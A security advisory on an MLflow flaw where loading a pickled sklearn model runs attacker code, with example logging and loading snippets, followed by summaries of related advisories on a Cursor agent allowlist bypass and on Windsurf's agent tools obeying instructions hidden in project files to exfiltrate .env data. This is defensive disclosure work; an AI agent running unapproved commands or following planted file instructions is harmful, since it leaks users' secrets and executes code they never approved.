SAI Security Advisory

Cloudpickle and Pickle Load on Sklearn Model Load Leading to Code Execution

June 4, 2024

Products Impacted

This vulnerability was introduced in version 1.1.0 of MLflow.

CVSS Score: 8.8

AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE Categorization

CWE-502: Deserialization of Untrusted Data.

Details

The vulnerability exists within the sklearn/__init__.py file, within the function _load_model_from_local_file. This is called when the mlflow.sklearn.load_model function is called.

def _load_model_from_local_file(path, serialization_format):
    ...
    with open(path, "rb") as f:...
   		 if serialization_format == SERIALIZATION_FORMAT_PICKLE:
   			 return pickle.load(f)
   		 elif serialization_format == SERIALIZATION_FORMAT_CLOUDPICKLE:
   			 import cloudpickle
   			 return cloudpickle.load(f)

An attacker can exploit this by injecting a pickle object that will execute arbitrary code when deserialized into a model. The attacker can then call the sklearn.log_model() function to serialize this model and log it to the tracking server. By default, cloudpickle.load is used on deserialization when the model is loaded. The serialization format can be set to ‘pickle’ when the model is logged in order to force the use of pickle.load() when the model is loaded. In the below example, the pickle object has been injected into the init method of the ElasticNet class.

with mlflow.start_run():
    	lr = ElasticNet(alpha=alpha, l1_ratio=l1_ratio, random_state=42)
    	lr.fit(train_x, train_y)

    	...

    	# Either upload model which will use default format of cloudpickle
mlflow.sklearn.log_model(lr, artifact_path="model", registered_model_name="SklearnPickleDefault")

# Or upload model and set serialiazation format to pickle
mlflow.sklearn.log_model(lr, artifact_path="model", registered_model_name="SklearnPickleDefault", serialization_format='pickle'
)

When the model is loaded by the victim (example code snippet below), the arbitrary code is executed on their machine:

import mlflow
...
logged_model = "models:/SklearnPickleDefault/1"
loaded_model = mlflow.sklearn.load_model(logged_model, dst_path='/tmp/sklearn_model')

Related SAI Security Advisory

CVE-2025-62354

November 26, 2025

Allowlist Bypass in Run Terminal Tool Allows Arbitrary Code Execution During Autorun Mode

Cursor

When in autorun mode with the secure ‘Follow Allowlist’ setting, Cursor checks commands sent to run in the terminal by the agent to see if a command has been specifically allowed. The function that checks the command has a bypass to its logic, allowing an attacker to craft a command that will execute non-whitelisted commands.

November 2025
SAI-ADV-2025-012

October 17, 2025

Data Exfiltration from Tool-Assisted Setup

Windsurf

Windsurf’s automated tools can execute instructions contained within project files without asking for user permission. This means an attacker can hide instructions within a project file to read and extract sensitive data from project files (such as a .env file) and insert it into web requests for the purposes of exfiltration.

October 2025